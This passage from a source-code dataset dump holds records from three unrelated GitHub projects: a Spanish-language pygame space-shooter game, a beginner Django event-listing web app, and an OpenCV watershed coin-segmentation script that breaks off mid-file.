0\n else:\n self.generando += 1\n return self.generando\n\n def generar(self):\n generador = self.cant_mod()\n if(generador == 0):\n ambiente.alarma_generar_modif_b = True\n ambiente.alarma_generar_modif_n = True\n pos_modif_n_generado = random.randint(20,constantes.ANCHO-20)\n pos_modif_b_generado = random.randint(20,constantes.ANCHO-20)\n ambiente.origen_modif_b = [pos_modif_b_generado,self.rect.y]\n ambiente.origen_modif_n = [pos_modif_n_generado,self.rect.y]\n\n def update(self):\n self.generar()\n super().update()\n" }, { "alpha_fraction": 0.5106970071792603, "alphanum_fraction": 0.5288129448890686, "avg_line_length": 35, "blob_id": "0451b5d362355e69b4cd68dd55760b9066ca894e", "content_id": "5dc2b01de540d9773bb3d6789554796f489d5165", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5796, "license_type": "no_license", "max_line_length": 142, "num_lines": 161, "path": "/models/jugador.py", "repo_name": "jgamer42/proyecto_compugrafica", "src_encoding": "UTF-8", "text": "import pygame\nfrom . import utilidades as util\nfrom . import ambiente\nfrom . import constantes\nfrom .misil import Misil\nfrom .misil2 import Misil2\nfrom . import variables\n\nclass Jugador(pygame.sprite.Sprite):\n def __init__(self,pos):\n pygame.sprite.Sprite.__init__(self)\n self.animaciones = []\n self.explosion =[]\n self.vidas = 3\n self.salud = 1000\n self.puntos = 0\n self.estado = 0\n self.frame = 0\n self.pos_inicial = pos\n sabana1 = pygame.image.load(\"./Sprites/jugador/PlayerShipSprite_I.png\")\n sabana2 = pygame.image.load(\"./Sprites/jugador/PlayerShipSprite_II.png\")\n sabana3 = pygame.image.load(\"./Sprites/jugador/PlayerShipSprite_III.png\")\n sabana_explosion = pygame.image.load(\"./Sprites/jugador/PlayerShipExplosion.png\")\n self.animaciones.append(util.recorte_imagen(sabana1,[90,67],3))\n self.animaciones.append(util.recorte_imagen(sabana2,[80,85],3))\n self.animaciones.append(util.recorte_imagen(sabana3,[120,90],3))\n self.animaciones.append(util.recorte_imagen(sabana_explosion,[128,100],4))\n self.image = self.animaciones[self.estado][self.frame]\n self.rect = self.image.get_rect()\n self.velx = 0\n self.vely = 0\n self.speed = False\n self.rect.x = pos[0]\n self.rect.y = pos[1]\n self.repeticiones = 0\n\n def update(self):\n self.frame = util.animar(self.frame,3)\n self.cambio_animacion()\n self.control_limites()\n self.evaluar_vida()\n self.animacion_muerte()\n self.jugador_en_juego()\n self.rect.x = self.velx + self.rect.x\n self.rect.y = self.vely + self.rect.y\n\n def evaluar_vida(self):\n if self.salud <= 0:\n self.reproducir_sonido(\"boom\")\n self.frenar()\n self.estado = 3\n\n def control_limites(self):\n if(self.rect.left <= 0):\n self.velx=0\n self.rect.x = self.rect.x + 1\n if(self.rect.right >= constantes.ANCHO):\n self.velx = 0\n self.rect.x = self.rect.x - 1\n\n if(self.rect.top <= constantes.ZONA_JUEGO):\n self.vely = 0\n self.rect.y = self.rect.y + 1\n if(self.rect.bottom >= constantes.ALTO):\n self.vely = 0\n self.rect.y = self.rect.y - 1\n\n def controles(self,evento,lista_balas):\n if(evento.type == pygame.KEYDOWN):\n if(evento.key == pygame.K_s):\n self.speed = True\n if(evento.key == pygame.K_RIGHT):\n if self.speed:\n self.velx = 15 * (self.estado + 1)\n self.vely = 0\n else:\n self.velx = 5 * (self.estado + 1)\n self.vely = 0\n if(evento.key == pygame.K_LEFT):\n if self.speed:\n self.velx = -15 * (self.estado + 1)\n self.vely = 0\n else:\n self.velx = -5 * (self.estado + 1)\n self.vely = 0\n if(evento.key == pygame.K_UP):\n if self.speed:\n self.vely = -15 * (self.estado + 1)\n self.velx = 0\n else:\n self.vely = -5 * (self.estado + 1)\n self.velx = 0\n if(evento.key == pygame.K_DOWN):\n if self.speed:\n self.vely = 15 * (self.estado + 1)\n self.velx = 0\n else:\n self.vely = 5 * (self.estado + 1)\n self.velx = 0\n if(evento.key == pygame.K_d and not ambiente.alarma_planeta):\n origen_disparo = [self.rect.right-20,self.rect.y]\n self.disparar(lista_balas,origen_disparo,variables.tipo_misil)\n self.reproducir_sonido(\"bala\")\n if(evento.key == pygame.K_a and not ambiente.alarma_planeta):\n origen_disparo = [self.rect.left,self.rect.y]\n self.disparar(lista_balas,origen_disparo,variables.tipo_misil)\n self.reproducir_sonido(\"bala\")\n if evento.type == pygame.KEYUP:\n if(evento.key == pygame.K_UP) or (evento.key == pygame.K_DOWN) or (evento.key == pygame.K_RIGHT) or (evento.key == pygame.K_LEFT):\n self.frenar()\n if evento.key == pygame.K_s:\n self.speed = False\n\n def frenar(self):\n self.velx=0\n self.vely=0\n\n def disparar(self,lista_balas,origen_disparo,tipo_misil):\n if tipo_misil == \"misil\":\n bala = Misil(origen_disparo)\n else:\n bala = Misil2(origen_disparo)\n lista_balas.add(bala)\n\n def cambio_animacion(self):\n pos_x = self.rect.x\n pos_y = self.rect.y\n self.image = self.animaciones[self.estado][self.frame]\n self.rect = self.image.get_rect()\n self.rect.x = pos_x\n self.rect.y = pos_y\n\n def reproducir_sonido(self,tipo):\n if tipo == \"bala\":\n variables.disparo.play()\n elif tipo == \"boom\":\n variables.explosion_jugador.play()\n\n\n def animacion_muerte(self):\n if(self.estado == 3):\n if(self.frame == 2 and self.repeticiones == 3):\n self.reiniciar()\n self.vidas -= 1\n elif(self.frame == 2):\n self.repeticiones += 1\n\n def reiniciar(self):\n self.salud = 1000\n self.estado = variables.estado_nave\n self.repeticiones = 0\n self.rect.x = self.pos_inicial[0]\n self.rect.y = self.pos_inicial[1]\n self.velx = 0\n self.vely = 0\n\n def jugador_en_juego(self):\n if(self.vidas > 0):\n pass\n else:\n ambiente.alarma_gameover = True\n" }, { "alpha_fraction": 0.6133027672767639, "alphanum_fraction": 0.6348623633384705, "avg_line_length": 35.63865661621094, "blob_id": "be56f2097b4c0a31403e5f62a2418d93a9966adf", "content_id": "7dff33f8ffd0157ba11207c61ca387ebe5b6f1c6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8722, "license_type": "no_license", "max_line_length": 93, "num_lines": 238, "path": "/models/ambiente.py", "repo_name": "jgamer42/proyecto_compugrafica", "src_encoding": "UTF-8", "text": "import pygame\nfrom . import constantes\nfrom models.misil_enemigo import Misil_enemigo\nfrom . import utilidades as util\nfrom . import variables\nfrom .asteroide1 import Asteroide1\nfrom .modificador_balas import Modificador_b\nfrom .modificador_nave import Modificador_n\n\n#alarmas\nalarma_disparo_enemigo = False\nalarma_generar_modif_b = False\nalarma_generar_modif_n = False\nalarma_generar_asteroide = False\nalarma_gameover = False\nalarma_victoria = False\nalarma_planeta = False\norigen_modif_b = None\norigen_modif_n = None\norigen_disparo_enemigo = None\norigen_asteroide = None\n\n#sprites\nsabana_numeros = pygame.image.load(\"./Sprites/Gui/Numeros0a9.png\")\nnumeros = util.recorte_imagen(sabana_numeros,[14,19],10)\n\n#lista de enemigos para colisiones\nnombres_enemigos = [\"misil_enemigo\",\"asteroide\",\"enemigo1\",\"enemigo2\"]\nelementos_borrar = [\"asteroide\",\"agujero\",\"planeta\",\"satelite\"]\n\ndef ciclo_de_juego(ventana,elementos,jugador,niveles,enemigos,jugadores):\n evaluar_victoria(ventana,enemigos,jugador,jugadores,niveles)\n condicion_derrota(niveles,jugador)\n ventana.fill(constantes.NEGRO)\n cargar_gui(ventana,jugador)\n for elemento in elementos:\n elemento.draw(ventana)\n elemento.update()\n pygame.display.flip()\n variables.reloj.tick(constantes.NUMERO_FPS)\n\n# elementos de la victoria\nfirework1 = pygame.image.load(\"./Sprites/Firework.png\")\nfirework2 = pygame.image.load(\"./Sprites/Firework2.png\")\nsprite_firework1 = util.recorte_explosion(firework1,[256,256],6,5)\nsprite_firework2 = util.recorte_explosion(firework2,[83,60],10,7)\n\ndef evaluar_victoria(ventana,enemigos,jugador,jugadores,niveles):\n global alarma_victoria\n if (not enemigos) and (not alarma_victoria):\n variables.music_juego.stop()\n jugador.frenar()\n niveles[0] = False\n niveles[1] = False\n niveles[2] = True\n alarma_victoria = True\n\ndef animar_victoria(ventana):\n frame1 = 0\n frame2 = 0\n for repeat in range(30):\n frame1 = util.animar(frame1,30)\n ventana.blit(sprite_firework1[frame1],(12,230))\n pygame.display.flip()\n for repeticion in range(70):\n frame2 = util.animar(frame2,70)\n ventana.blit(sprite_firework2[frame2],(170,280))\n pygame.display.flip()\n\ndef condicion_derrota(niveles,jugador):\n if(alarma_gameover):\n jugador.tipo_misil = \"misil\"\n jugador.estado = 0\n jugador.puntos = 0\n niveles[0] = False\n niveles[1] = False\n niveles[2] = True\n\ndef cargar_gui(ventana,jugador):\n seleccionar_pos_fondo()\n ventana.blit(variables.fondo,[0,variables.pos_fondo])\n ventana.blit(variables.saba_puntos,[0,0])\n pos_sprite_salud = seleccionar_sprite_salud(jugador)\n ventana.blit(variables.sprite_salud[pos_sprite_salud],[constantes.ANCHO-80,0])\n ventana.blit(variables.sprite_vidas[jugador.vidas-1],[constantes.ANCHO-196,0])\n dibujar_puntos_jugador(ventana,jugador.puntos)\n\ndef seleccionar_sprite_salud(jugador):\n if(0 < jugador.salud < 430):\n return(4)\n elif(430 <= jugador.salud < 472):\n return(3)\n elif(472 <= jugador.salud < 715):\n return(2)\n elif(715 <= jugador.salud < 1000):\n return(1)\n else:\n return(0)\n\ndef seleccionar_pos_fondo():\n if(variables.pos_fondo == 0):\n variables.pos_fondo = -3450\n else:\n variables.pos_fondo = variables.pos_fondo + constantes.VELOCIDAD_ENTORNO\n\ndef protector_memoria(elementos):\n for elemento in elementos:\n for e in elemento:\n if e.type in elementos_borrar:\n if(e.rect.y > constantes.ALTO):\n elemento.remove(e)\n else:\n if(e.rect.bottom <= 0) or (e.rect.top > constantes.ALTO):\n elemento.remove(e)\n if(e.rect.x <= 0) or (e.rect.x > constantes.ANCHO):\n elemento.remove(e)\n\ndef controles(evento,nivel,en_juego,niveles,jugador=None,estado=None):\n global alarma_gameover\n if(evento.type == pygame.KEYDOWN):\n if nivel == 0:\n if (evento.key == pygame.K_SPACE):\n niveles[nivel]=False\n if (nivel==2):\n if (evento.key == pygame.K_SPACE):\n if(estado[0] == 0):\n en_juego[0] = False\n niveles[2] = False\n elif(estado[0] == 1):\n alarma_gameover = False\n jugador.vidas = 3\n niveles[0] = True\n niveles[1] = True\n niveles[2] = False\n if (evento.key == pygame.K_RIGHT):\n estado[0] = 1\n if (evento.key == pygame.K_LEFT):\n estado[0] = 0\n if evento.type == pygame.QUIT:\n en_juego[0] = False\n\ndef gestionar_disparo_enemigo(balas_enemigos):\n global origen_disparo_enemigo\n global alarma_disparo_enemigo\n if(alarma_disparo_enemigo == True):\n misil = Misil_enemigo(origen_disparo_enemigo)\n balas_enemigos.add(misil)\n alarma_disparo_enemigo=False\n\ndef gestionar_generacion_modific_Balas(modificadores):\n global origen_modif_b\n global alarma_generar_modif_b\n if(alarma_generar_modif_b == True):\n modificador_b = Modificador_b(origen_modif_b)\n modificadores.add(modificador_b)\n alarma_generar_modif_b = False\n\ndef gestionar_generacion_modific_naves(modificadores):\n global origen_modif_n\n global alarma_generar_modif_n\n if(alarma_generar_modif_n == True):\n modificador_n = Modificador_n(origen_modif_n)\n modificadores.add(modificador_n)\n alarma_generar_modif_n = False\n\ndef gestionar_generacion_asteroide(asteroides):\n global origen_asteroide\n global alarma_generar_asteroide\n if(alarma_generar_asteroide == True):\n asteroide = Asteroide1(origen_asteroide)\n asteroides.add(asteroide)\n alarma_generar_asteroide = False\n\ndef gestionar_colision_jugador(jugador,lista_elementos_colisionables):\n for lista_colisiones in lista_elementos_colisionables:\n colisiones = pygame.sprite.spritecollide(jugador,lista_colisiones,True)\n for colision in colisiones:\n if (colision.type in nombres_enemigos):\n jugador.salud -= colision.daño\n elif colision.type == \"modificador_bala\":\n variables.tipo_misil = \"misil2\"\n elif colision.type == \"modificador_nave\":\n jugador.estado = 1\n variables.estado_nave = 1\n\ndef gestionar_colision_enemigo(balas_jugador, lista_elementos_colisionables,jugador,ventana):\n for bala in balas_jugador:\n for lista_colisiones in lista_elementos_colisionables:\n colisiones = pygame.sprite.spritecollide(bala,lista_colisiones,False)\n for colision in colisiones:\n if colision.type in nombres_enemigos:\n if colision.type == \"misil_enemigo\":\n util.explosion_enemigos(ventana,colision.posActual)\n lista_colisiones.remove(colision)\n jugador.puntos += colision.puntos\n else:\n colision.salud -= bala.daño\n jugador.puntos += colision.puntos_impacto\n if(colision.salud <= 0):\n util.explosion_enemigos(ventana,colision.posActual)\n lista_colisiones.remove(colision)\n jugador.puntos += colision.puntos_destruir\n balas_jugador.remove(bala)\n\ndef dibujar_puntos_jugador(ventana,puntos):\n miles = puntos/1000\n centena = (puntos - ((int(puntos/1000))*1000))/100\n decena = (puntos % 100)/10\n unidad = decena % 10\n\n if int(miles) != 0:\n ventana.blit(numeros[int(miles)],[160,5])\n if int(centena) != 0 or miles > 0:\n ventana.blit(numeros[int(centena)],[177,5])\n if int(decena) != 0 or centena > 0 or miles > 0:\n ventana.blit(numeros[int(decena)],[194,5])\n\n ventana.blit(numeros[int(unidad)],[211,5])\n pygame.display.flip()\n\ndef gestionar_elementos_ambientales(jugador,elementos_ambientales):\n for elemento in elementos_ambientales:\n if(elemento.type == \"agujero\"):\n logica_agujero_negro(elemento,jugador)\n if(elemento.type == \"planeta\"):\n logica_planeta(elemento)\n\ndef logica_agujero_negro(elemento,jugador):\n if(0 < elemento.rect.y < constantes.ALTO):\n if(elemento.rect.top< jugador.rect.y < elemento.rect.bottom):\n jugador.velx = 5*elemento.direccion\n\ndef logica_planeta(elemento):\n global alarma_planeta\n if(0 < elemento.rect.y < constantes.ALTO):\n alarma_planeta = True\n else:\n alarma_planeta = False\n" }, { "alpha_fraction": 0.6359349489212036, "alphanum_fraction": 0.6540910005569458, "avg_line_length": 41.838382720947266, "blob_id": "88017eef87c059364553c82691fa27e060506d59", "content_id": "fdf3f1825c86542bf0181049bbb677ef51097465", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4241, "license_type": "no_license", "max_line_length": 138, "num_lines": 99, "path": "/GalaxyWarSurvival.py", "repo_name": "jgamer42/proyecto_compugrafica", "src_encoding": "UTF-8", "text": "import pygame\nimport random\nfrom models import ambiente\nfrom models import constantes\nfrom models import utilidades\nfrom models.jugador import Jugador\nfrom models.enemigo1 import Enemigo1\nfrom models.enemigo2 import Enemigo2\nfrom models.asteroide1 import Asteroide1\nfrom models.generador_asteroides import Generador_asteroides\nfrom models.satelite import Satelite\nfrom models.modificador_balas import Modificador_b\nfrom models.modificador_nave import Modificador_n\nfrom models.agujero_negro import Agujero_negro\nfrom models.planeta import Planeta\nfrom models.variables import *\n\nif __name__ == \"__main__\":\n pygame.init()\n pygame.mixer.init()\n ventana = pygame.display.set_mode([constantes.ANCHO,constantes.ALTO])\n\n agujero = Agujero_negro([0,-100],constantes.DERECHA)\n planeta = Planeta([400,-1200])\n jugador = Jugador([340,620])\n satelite = Satelite([100,100])\n generador_asteroides = Generador_asteroides([50,50])\n\n niveles = [True,True,True]\n en_juego = [True]\n estado = [0]\n\n while en_juego[0]:\n #Pantalla de inicio\n music_intro.set_volume(0.4)\n music_intro.play(-1)\n while (niveles[0] and en_juego[0]):\n for evento in pygame.event.get():\n ambiente.controles(evento,0,en_juego,niveles)\n ventana.blit(PantInit, [0,0])\n ventana.blit(LogoPantInit, [116,150])\n pygame.display.flip()\n music_intro.stop()\n\n #Nivel 1CD\n ambiente.alarma_victoria = False\n elementos_ambientales.add(agujero)\n elementos_ambientales.add(planeta)\n jugadores.add(jugador)\n satelites.add(generador_asteroides)\n satelites.add(satelite)\n utilidades.generar_enemigos(enemigos)\n\n music_juego.set_volume(0.5)\n music_juego.play(-1)\n while (niveles[1] and en_juego[0]):\n for evento in pygame.event.get():\n ambiente.controles(evento,1,en_juego,niveles)\n jugador.controles(evento,balas_jugador)\n ambiente.gestionar_elementos_ambientales(jugador,elementos_ambientales)\n ambiente.gestionar_disparo_enemigo(balas_enemigos)\n ambiente.gestionar_generacion_asteroide(asteroides)\n ambiente.gestionar_generacion_modific_Balas(modificadores)\n ambiente.gestionar_generacion_modific_naves(modificadores)\n elementos_colisionables = [balas_enemigos,enemigos,asteroides,modificadores]\n ambiente.gestionar_colision_jugador(jugador,elementos_colisionables)\n ambiente.gestionar_colision_enemigo(balas_jugador,elementos_colisionables,jugador,ventana)\n elementos_dibujar = [balas_enemigos,balas_jugador,jugadores,enemigos,satelites,elementos_ambientales,asteroides,modificadores]\n elementos_borrar = [balas_enemigos,balas_jugador,elementos_ambientales,satelites,asteroides,modificadores]\n ambiente.protector_memoria(elementos_borrar)\n ambiente.ciclo_de_juego(ventana,elementos_dibujar,jugador,niveles,enemigos,jugadores)\n music_juego.stop()\n\n if ambiente.alarma_victoria:\n ambiente.protector_memoria([satelites,elementos_ambientales,modificadores])\n sound_Fireworks1.play(-1)\n sound_Fireworks2.play(-1)\n while (niveles[2] and en_juego[0]):\n for evento in pygame.event.get():\n ambiente.controles(evento,2,en_juego,niveles,jugador,estado)\n ventana.fill(constantes.NEGRO)\n cargar = Victoria[estado[0]]\n ventana.blit(cargar, [0,0])\n ambiente.animar_victoria(ventana)\n pygame.display.flip()\n sound_Fireworks1.stop()\n sound_Fireworks2.stop()\n else:\n #fin de juego\n music_out.set_volume(0.4)\n music_out.play(-1)\n while (niveles[2] and en_juego[0]):\n for evento in pygame.event.get():\n ambiente.controles(evento,2,en_juego,niveles,jugador,estado)\n ventana.fill(constantes.NEGRO)\n cargar = GameOver[estado[0]]\n ventana.blit(cargar, [0,0])\n pygame.display.flip()\n music_out.stop()\n" } ]
21
SuhasKamble/DJEVNT-Django-Project
https://github.com/SuhasKamble/DJEVNT-Django-Project
a7fa1ecd8cddddac81f221b9e6c750020763c699
b180cbad04cf469873868552ebb9db652291b2c5
4894abe0a572518421c010a707869e84c68daa64
refs/heads/master
2023-04-08T10:21:16.194993
2021-04-21T13:54:41
2021-04-21T13:54:41
360,188,320
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.4976525902748108, "alphanum_fraction": 0.5751173496246338, "avg_line_length": 21.421052932739258, "blob_id": "76291f67a825bd49087632e1070cb4e2453847c2", "content_id": "aef8f7331f4fac1479444477ea45ab490b78ad5d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 426, "license_type": "no_license", "max_line_length": 62, "num_lines": 19, "path": "/home/migrations/0003_event_user.py", "repo_name": "SuhasKamble/DJEVNT-Django-Project", "src_encoding": "UTF-8", "text": "# Generated by Django 3.0.7 on 2021-04-21 03:27\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('home', '0002_auto_20210420_2011'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='event',\n name='user',\n field=models.CharField(default='', max_length=70),\n preserve_default=False,\n ),\n ]\n" }, { "alpha_fraction": 0.5098591446876526, "alphanum_fraction": 0.5633803009986877, "avg_line_length": 18.72222137451172, "blob_id": "10bbd844f2e8055c880315245534c98d06a3de8f", "content_id": "9e1039db14cb3c453213c1d14fc5e9fa2709800d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 355, "license_type": "no_license", "max_line_length": 47, "num_lines": 18, "path": "/home/migrations/0002_auto_20210420_2011.py", "repo_name": "SuhasKamble/DJEVNT-Django-Project", "src_encoding": "UTF-8", "text": "# Generated by Django 3.0.7 on 2021-04-20 14:41\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('home', '0001_initial'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='event',\n old_name='performer',\n new_name='performers',\n ),\n ]\n" }, { "alpha_fraction": 0.6439751386642456, "alphanum_fraction": 0.644472062587738, "avg_line_length": 34.29824447631836, "blob_id": "2a1efde52a3cb79cd79008cab6491c8450479c4c", "content_id": "9654ff5832e9c1302872ef03d06e2ab4995a065d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4025, "license_type": "no_license", "max_line_length": 125, "num_lines": 114, "path": "/home/views.py", "repo_name": "SuhasKamble/DJEVNT-Django-Project", "src_encoding": "UTF-8", "text": "from django.shortcuts import render, HttpResponse,redirect\nfrom .models import Event\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib import messages\n\n\n# Create your views here.\n\ndef home(request):\n allEvents = Event.objects.all()[0:4] \n context = {'allEvents':allEvents}\n \n return render(request,'home/index.html',context)\ndef events(request):\n allEvents = Event.objects.all()\n context = {'allEvents':allEvents}\n return render(request,'home/Events.html',context)\n \n\ndef addEvent(request):\n if request.user.is_authenticated: \n if request.method==\"POST\":\n user = request.user.username\n name = request.POST.get('name')\n performers = request.POST.get('performers')\n venue = request.POST.get('venue')\n address = request.POST.get('address')\n date = request.POST.get('date')\n time = request.POST.get('time')\n image = request.POST.get('image')\n desc = request.POST.get('desc')\n newEvent = Event(user=user,name=name,performers=performers,venue=venue,image=image,date=date,time=time,desc=desc)\n newEvent.save()\n messages.success(request,\"You have successfully added event \")\n return redirect('/')\n\n return render(request,'home/AddEvent.html')\n else:\n return HttpResponse(\"User is not authentical\") \n\ndef details(request,slug):\n event = Event.objects.filter(name=slug).first()\n context = {'event':event}\n return render(request,'home/Detail.html',context)\n\n \n return render(request,'home/Detail.html',context)\n\ndef dashboard(request):\n if request.user.is_authenticated:\n allEvents = Event.objects.filter(user=request.user.username)\n context = {'allEvents':allEvents}\n return render(request,'home/Dashboard.html',context)\n else:\n return HttpResponse(\"You are not authenticates\") \n\ndef handleLogin(request):\n if request.method == \"POST\":\n username = request.POST.get(\"username\")\n password = request.POST.get(\"password\")\n user = authenticate(username=username,password=password)\n if user is not None:\n login(request,user)\n messages.success(request,\"You have successgully logged in\")\n return redirect('/')\n \n else:\n messages.error(request,\"Invalid Credentials. Please try again\") \n return redirect('/login') \n \n return render(request,'home/Login.html')\n\ndef handleSignin(request):\n if request.method== \"POST\":\n username = request.POST.get('username')\n email = request.POST.get(\"email\")\n password = request.POST.get('password')\n cpassword = request.POST.get('cpassword')\n if password==cpassword:\n user = User.objects.create_user(username,email,password)\n user.save()\n messages.success(request,\"You have successfully registered \")\n return redirect('/login')\n else:\n messages.error(request,\"Password do not match \") \n return redirect(\"/register\") \n \n \n return render(request,'home/Register.html')\n\ndef handleLogout(request):\n logout(request)\n messages.success(request,\"You have successfully logged out \")\n return redirect(\"/\")\n\ndef editEvent(request,slug):\n event = Event.objects.filter(name=slug).first()\n Event.objects.filter(name=slug).delete()\n context = {'event':event}\n return render(request,'home/AddEvent.html',context)\n\ndef deleteEvent(request,slug):\n Event.objects.filter(name=slug).delete()\n messages.error(request,\"You have successgully deleted a event \")\n return redirect(\"/dashboard\")\n\ndef search(request):\n \n query = request.POST.get('query')\n events = Event.objects.filter(name__icontains=query)\n context = {\"events\":events,'query':query}\n \n return render(request,'home/Search.html',context) " }, { "alpha_fraction": 0.48708009719848633, "alphanum_fraction": 0.5232558250427246, "avg_line_length": 27.66666603088379, "blob_id": "dd5a4c5df5411aac79718cef2fb5e0a8ffa8040c", "content_id": "609c437c3a8bbd32a035acca7471f69a59ee1d9b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 774, "license_type": "no_license", "max_line_length": 77, "num_lines": 27, "path": "/home/migrations/0001_initial.py", "repo_name": "SuhasKamble/DJEVNT-Django-Project", "src_encoding": "UTF-8", "text": "# Generated by Django 3.0.7 on 2021-04-20 14:36\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Event',\n fields=[\n ('sno', models.AutoField(primary_key=True, serialize=False)),\n ('name', models.CharField(max_length=200)),\n ('performer', models.CharField(max_length=200)),\n ('venue', models.CharField(max_length=200)),\n ('image', models.CharField(max_length=2000)),\n ('date', models.DateField()),\n ('time', models.TimeField()),\n ('desc', models.TextField()),\n ],\n ),\n ]\n" }, { "alpha_fraction": 0.6455696225166321, "alphanum_fraction": 0.6781193614006042, "avg_line_length": 30.941177368164062, "blob_id": "e5f7d22ef5b6d36be4ecd6384da998d2b4737fa5", "content_id": "6d0465d85b2c9bc27ae65fb24a1f5c8f2942446f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 553, "license_type": "no_license", "max_line_length": 49, "num_lines": 17, "path": "/home/models.py", "repo_name": "SuhasKamble/DJEVNT-Django-Project", "src_encoding": "UTF-8", "text": "from django.db import models\n\n# Create your models here.\nclass Event(models.Model):\n sno = models.AutoField(primary_key=True)\n user = models.CharField(max_length=70)\n name = models.CharField(max_length=200)\n performers = models.CharField(max_length=200)\n venue = models.CharField(max_length=200)\n address = models.CharField(max_length=300)\n image = models.CharField(max_length=2000)\n date = models.DateField()\n time = models.TimeField()\n desc = models.TextField()\n\n def __str__(self):\n return self.name\n \n \n" }, { "alpha_fraction": 0.6918767690658569, "alphanum_fraction": 0.6918767690658569, "avg_line_length": 43.625, "blob_id": "263cfc86f968f17d7dd0e0442728f29447591491", "content_id": "b4e15c5532f1ae1e1586f7c0950c32cfa9646f36", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 714, "license_type": "no_license", "max_line_length": 68, "num_lines": 16, "path": "/home/urls.py", "repo_name": "SuhasKamble/DJEVNT-Django-Project", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom django.urls import path\nfrom . import views\nurlpatterns = [\n path('',views.home,name=\"Home\"),\n path('events',views.events,name=\"All Events\"),\n path('addEvent',views.addEvent,name=\"Add Event\"),\n path('dashboard',views.dashboard,name=\"Dashboard\"),\n path('details/<str:slug>',views.details,name=\"Event Details\"),\n path('login',views.handleLogin,name=\"Login\"),\n path('register',views.handleSignin,name=\"Register\"), \n path('logout',views.handleLogout,name=\"Logout\"),\n path(\"edit/<str:slug>\",views.editEvent,name=\"Edit Event\"),\n path(\"delete/<str:slug>\",views.deleteEvent,name=\"Delete Event\"),\n path(\"search\",views.search,name=\"Search Event\"),\n]\n" }, { "alpha_fraction": 0.4243420958518982, "alphanum_fraction": 0.43311402201652527, "avg_line_length": 26.636363983154297, "blob_id": "5546c3393e7914cfb5f08c829aafb52c5c145f64", "content_id": "69b7c307b5f9abebc3a30822170ee671b46720cf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 912, "license_type": "no_license", "max_line_length": 80, "num_lines": 33, "path": "/templates/home/index.html", "repo_name": "SuhasKamble/DJEVNT-Django-Project", "src_encoding": "UTF-8", "text": "\n{% extends 'base.html' %}\n{% block title %}\n Home\n{% endblock title %}\n{% block body %}\n <!-- Banner -->\n <div class=\"banner\">\n <h1>Welcome To The Party</h1>\n <h3>Find the hottest DJ event</h3>\n </div>\n \n <!-- Events -->\n <div class=\"events container\">\n <h2>Upcoming Events</h2>\n <div class=\"events-container\">\n {% for event in allEvents %}\n \n <div class=\"event\">\n <div class=\"event-img\">\n <img src=\"{{event.image}}\" alt=\"Event Image\">\n </div>\n <div class=\"event-info\">\n <p>{{event.date}} at {{event.time}}</p>\n <h3>{{event.name}}</h3>\n </div>\n <a href=\"/details/{{event.name}}\" class=\"detail-btn\">Details</a>\n </div>\n \n {% endfor %}\n \n </div>\n </div>\n{% endblock body %}" } ]
7
ilkerkuss/OpenCV-Count-and-Detect-Coin
https://github.com/ilkerkuss/OpenCV-Count-and-Detect-Coin
c207649d8dc2fe3e47792de9cfe89134c622f8c4
e39ac9d2d5a0dd3112dca0305933bff5042026c2
e01fc2ddbb0a5e5cbcaffbfd9a1985b51c2a3eed
refs/heads/main
2023-06-15T06:47:21.639000
2021-07-02T18:50:19
2021-07-02T18:50:19
382,436,018
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7059986591339111, "alphanum_fraction": 0.7382992506027222, "avg_line_length": 24.72881317138672, "blob_id": "effdce6f8b214fe1c630d771fae5ccf0c20f47fc", "content_id": "57b40c584b39e245f0fe0f40d553886e83e2e553", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1517, "license_type": "no_license", "max_line_length": 74, "num_lines": 59, "path": "/watershed_segmentation.py", "repo_name": "ilkerkuss/OpenCV-Count-and-Detect-Coin", "src_encoding": "UTF-8", "text": "import numpy as np\nimport cv2 as cv\nimport matplotlib.pyplot as plt\nfrom skimage import color\n\nimg = cv.imread(r\"C:\\Users\\W10\\Desktop\\water_coins.jpg\")\ngray = cv.cvtColor(img,cv.COLOR_BGR2GRAY)\nret, thresh = cv.threshold(gray,0,255,cv.THRESH_BINARY_INV+cv.THRESH_OTSU)\ncv.imshow(\"grey scale\", gray)\ncv.imshow(\"thresh\", thresh)\ncv.waitKey(0)\n\n# noise removal\nkernel = np.ones((3,3),np.uint8)\nopening = cv.morphologyEx(thresh,cv.MORPH_OPEN,kernel, iterations = 2)\ncv.imshow(\"open\", opening)\ncv.waitKey(0)\n\n# sure background area\nsure_bg = cv.dilate(opening,kernel,iterations=3)\ncv.imshow(\"dilate\", sure_bg)\ncv.waitKey(0)\n\n# Finding sure foreground area\ndist_transform = cv.distanceTransform(opening,cv.DIST_L2,5)\nret, sure_fg = cv.threshold(dist_transform,0.7*dist_transform.max(),255,0)\ncv.imshow(\"dist\", dist_transform)\ncv.imshow(\"sure fg\", sure_fg)\ncv.waitKey(0)\n\n# Finding unknown region\nsure_fg = np.uint8(sure_fg)\nunknown = cv.subtract(sure_bg,sure_fg)\n\n\n\ncv.imshow(\"unknown reg\", unknown)\n\ncv.waitKey(0)\n\n# Marker labelling\nret, markers = cv.connectedComponents(sure_fg)\nmarkers = markers.astype(np.int32)\n# Add one to all labels so that 